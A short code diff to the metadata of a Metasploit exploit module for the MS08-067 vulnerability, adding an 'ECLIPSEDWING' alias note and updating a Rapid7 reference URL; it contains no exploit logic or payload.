@@ -30,13 +30,16 @@ class MetasploitModule < Msf::Exploit::Remote
           'jduck', # XP SP2/SP3 AlwaysOn DEP bypass
         ],
       'License'        => MSF_LICENSE,
+       'Notes' => {
+          'AKA' => ['ECLIPSEDWING']
+       },
       'References'     =>
         [
           %w(CVE 2008-4250),
           %w(OSVDB 49243),
           %w(MSB MS08-067),
           # If this vulnerability is found, ms08-67 is exposed as well
-          ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
+          ['URL', 'https://www.rapid7.com/db/vulnerabilities/dcerpc-ms-netapi-netpathcanonicalize-dos/']
         ],
       'DefaultOptions' =>
         {
